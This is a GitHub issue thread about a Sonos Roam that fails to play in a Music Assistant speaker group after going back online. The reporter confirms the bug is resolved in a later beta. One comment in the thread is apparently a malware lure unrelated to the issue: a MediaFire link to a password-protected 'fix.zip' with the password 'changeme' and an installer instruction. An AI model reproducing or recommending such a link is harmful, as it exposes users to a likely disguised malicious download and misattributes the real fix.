### ISSUE TITLE
Battery power speaker that went back online, does not play in group

### ISSUE THREAD

**Issue by HA-TB303** [music-assistant/hass-music-assistant#2820]
### What version of Music Assistant has the issue?

2.3.0b6

### What version of the Home Assistant Integration have you got installed?

2024.8.1

### Have you tried everything in the Troubleshooting FAQ and reviewed the Open and Closed Issues and Discussions to resolve this yourself?

- [X] Yes

### The problem

As a follow-up to issue https://github.com/music-assistant/hass-music-assistant/issues/2257 a battery powered Sonos speaker which was offline, but then switched on, does not play in a group.

### How to reproduce

Put 3 speakers in a group, of which one is a battery powered sonos roam. Then turn the Sonos roam off. Play a file to the group. This works on the 2 remaining speakers

Then turn the Sonos Roam on and play a song to the group. It will not play on the Sonos Roam.

### Music Providers

N/A

### Player Providers

Sonos

### What version of Home Assistant Core are your running

2024.8.3

### What type of installation are you running?

Home Assistant OS

### On what type of hardware are you running?

Generic x86-64 (e.g. Intel NUC)

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marcelveldt** [comment]
can you recheck this with the just released 2.3.0 beta 7 ?

**Comment by HA-TB303** [comment]
It now plays just fine in the group. I have tried switching it on and off multiple times and creating and 'destroying' the group. No issues regarding playback anymore. 👍

**Comment by marcelveldt** [comment]
> It now plays just fine in the group. I have tried switching it on and off multiple times and creating and 'destroying' the group. No issues regarding playback anymore. 👍

Great! Thanks for testing!
